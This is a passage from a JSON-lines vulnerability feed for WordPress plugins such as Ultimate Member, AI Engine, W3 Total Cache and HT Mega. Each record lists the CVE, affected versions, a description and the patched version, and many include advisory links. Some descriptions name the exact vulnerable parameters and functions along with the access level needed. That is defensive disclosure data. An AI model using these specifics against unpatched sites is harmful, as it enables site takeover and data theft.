version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bcbc6b6-ed05-4709-bf05-214418798339?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7bcbc6b6-ed05-4709-bf05-214418798339?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097563\\\/mobile-menu\\\/trunk\\\/includes\\\/class-wp-mobile-menu-core.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097563\\\/mobile-menu\\\/trunk\\\/includes\\\/class-wp-mobile-menu-core.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2123","slug":"ultimate-member","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-grid.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L53\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/templates\\\/members-list.php#L53\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046611\\\/ultimate-member#file746\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046611\\\/ultimate-member#file746\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5071","slug":"ai-engine","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The AI Engine plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'Meow_MWAI_Labs_MCP::can_access_mcp' function in versions 2.8.0 to 2.8.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to have full access to the MCP and run various commands like 'wp_create_user', 'wp_update_user' and 'wp_update_option', which can be used for privilege escalation, and 'wp_update_post', 'wp_delete_post', 'wp_update_comment' and 'wp_delete_comment', which can be used to edit and delete posts and comments.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.1\\\/labs\\\/mcp.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ai-engine\\\/tags\\\/2.8.1\\\/labs\\\/mcp.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313554\\\/ai-engine#file21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3313554\\\/ai-engine#file21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e7654a1-0020-4bf1-86be-bdb238a9fe0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e7654a1-0020-4bf1-86be-bdb238a9fe0d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1802","slug":"ht-mega-for-elementor","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018marker_title\u2019, 'notification_content', and 'stt_button_text' parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.8.3.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/scroll-to-top\\\/assets\\\/js\\\/htmega-scroll-to-top.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/extensions\\\/scroll-to-top\\\/assets\\\/js\\\/htmega-scroll-to-top.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_googlemap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_googlemap.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_notify.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/htmega_notify.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257530\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257530\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68530904-22d2-4228-b9f2-76f5ee1fd541?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68530904-22d2-4228-b9f2-76f5ee1fd541?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-54384","slug":"falcon","versionImpact":"2.8.3","versionEndExcluding":"2.8.4","description":"Missing Authorization vulnerability in eLightUp Falcon \u2013 WordPress Optimizations & Tweaks allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Falcon \u2013 WordPress Optimizations & Tweaks: from n\/a through 2.8.3.","recommendation":"Update to version 2.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/falcon\\\/vulnerability\\\/wordpress-falcon-wordpress-optimizations-tweaks-plugin-2-8-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/falcon\\\/vulnerability\\\/wordpress-falcon-wordpress-optimizations-tweaks-plugin-2-8-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6164","slug":"ymc-smart-filter","versionImpact":"2.8.32","versionEndExcluding":"2.8.33","description":"The Filter & Grids WordPress plugin before 2.8.33 is vulnerable to Local File Inclusion via the post_layout parameter. This makes it possible for an unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.","recommendation":"Update to version 2.8.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40bd880e-67a1-4180-b197-8dcadaa0ace4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/40bd880e-67a1-4180-b197-8dcadaa0ace4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9049","slug":"beaver-builder-lite-version","versionImpact":"2.8.3.6","versionEndExcluding":"2.8.3.7","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button Group module in all versions up to, and including, 2.8.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.3.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13517c2f-43ce-4e9a-81c4-d422b0e7273a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13517c2f-43ce-4e9a-81c4-d422b0e7273a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157026\\\/beaver-builder-lite-version\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157026\\\/beaver-builder-lite-version\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10871","slug":"category-ajax-filter","versionImpact":"2.8.2","versionEndExcluding":"2.8.3","description":"The Category Ajax Filter plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.8.2 via the 'params[caf-post-layout]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where files with a .php extension can be uploaded and included.","recommendation":"Update to version 2.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb03d81-ac33-487b-bf4d-927e8104866e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb03d81-ac33-487b-bf4d-927e8104866e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-ajax-filter\\\/tags\\\/2.8.2\\\/includes\\\/functions.php#L180\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-ajax-filter\\\/tags\\\/2.8.2\\\/includes\\\/functions.php#L180\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183800\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183800\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1261","slug":"ht-mega-for-elementor","versionImpact":"2.8.2","versionEndExcluding":"2.8.3","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability exists due to an incomplete fix for CVE-2024-3307.","recommendation":"Update to version 2.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/ht-mega-for-elementor\\\/tags\\\/2.8.3\\\/assets\\\/js\\\/htmega-widgets-active.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249106\\\/ht-mega-for-elementor\\\/tags\\\/2.8.3\\\/assets\\\/js\\\/htmega-widgets-active.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e553135d-88e0-4840-99ad-9514c2243b7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e553135d-88e0-4840-99ad-9514c2243b7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4415","slug":"sunshine-photo-cart ","versionEndExcluding":"2.8.29","description":"The Sunshine Photo Cart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.28. This is due to missing or incorrect nonce validation on the sunshine_products_quicksave_post() function. This makes it possible for unauthenticated attackers to save custom post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c043510b-6aeb-4e91-80f0-a62970c01b1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c043510b-6aeb-4e91-80f0-a62970c01b1d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548557\\\/sunshine-photo-cart\\\/tags\\\/2.8.29\\\/admin\\\/sunshine-products.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548557\\\/sunshine-photo-cart\\\/tags\\\/2.8.29\\\/admin\\\/sunshine-products.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7622","slug":"revision-manager-tmc","versionImpact":"2.8.19","versionEndExcluding":"2.8.20","description":"The Revision Manager TMC plugin for WordPress is vulnerable to unauthorized arbitrary email sending due to a missing capability check on the _a_ajaxQuickEmailTestCallback() function in all versions up to, and including, 2.8.19. This makes it possible for authenticated attackers, with subscriber-level access and above, to send emails with arbitrary content to any individual through the vulnerable web server.","recommendation":"Update to version 2.8.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8a6ff9-6aa8-4e0f-b058-759561a55508?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c8a6ff9-6aa8-4e0f-b058-759561a55508?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revision-manager-tmc\\\/trunk\\\/src\\\/Components\\\/Notifications.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revision-manager-tmc\\\/trunk\\\/src\\\/Components\\\/Notifications.php#L357\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147298\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3147298\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10692","slug":"powerpack-lite-for-elementor","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The PowerPack Elementor Addons (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 via the Content Reveal widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from password protected, private, or draft posts that they should not have access to.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203205\\\/powerpack-lite-for-elementor\\\/tags\\\/2.8.2\\\/modules\\\/content-reveal\\\/widgets\\\/content-reveal.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3203205\\\/powerpack-lite-for-elementor\\\/tags\\\/2.8.2\\\/modules\\\/content-reveal\\\/widgets\\\/content-reveal.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d073d9df-0636-4884-b5d0-e2da779e5edf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d073d9df-0636-4884-b5d0-e2da779e5edf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12365","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the is_w3tc_admin_page function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to obtain the plugin's nonce value and perform unauthorized actions, resulting in information disclosure, service plan limits consumption as well as making web requests to arbitrary locations originating from the web application that can be used to query information from internal services, including instance metadata on cloud-based applications.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extension_ImageService_Plugin_Admin.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extension_ImageService_Plugin_Admin.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L246\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L246\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L385\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L385\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L516\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L516\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/footer.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/footer.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/top_nav_bar.php#L217\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/inc\\\/options\\\/common\\\/top_nav_bar.php#L217\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Root_Loader.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Root_Loader.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/UsageStatistics_Plugin_Admin.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Admin.php#L822\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Admin.php#L822\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/w3-total-cache.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/w3-total-cache.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/196e629f-7c77-4bcb-8224-305a0108b630?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/196e629f-7c77-4bcb-8224-305a0108b630?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12008","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.8.1 through the publicly exposed debug log file. This makes it possible for unauthenticated attackers to view potentially sensitive information in the exposed log file. For example, the log file may contain nonce values that can be used in further CSRF attacks.\r\nNote: the debug feature must be enabled for this to be a concern, and it is disabled by default.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Debug.php#L29\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Debug.php#L29\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Environment.php#L430\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Util_Environment.php#L430\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8292f23c-fb17-4082-9788-f643d1bb097e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8292f23c-fb17-4082-9788-f643d1bb097e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12006","slug":"w3-total-cache","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The W3 Total Cache plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.1. This makes it possible for unauthenticated attackers to deactivate the plugin as well as activate and deactivate plugin extensions.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Extensions_Plugin_Admin.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\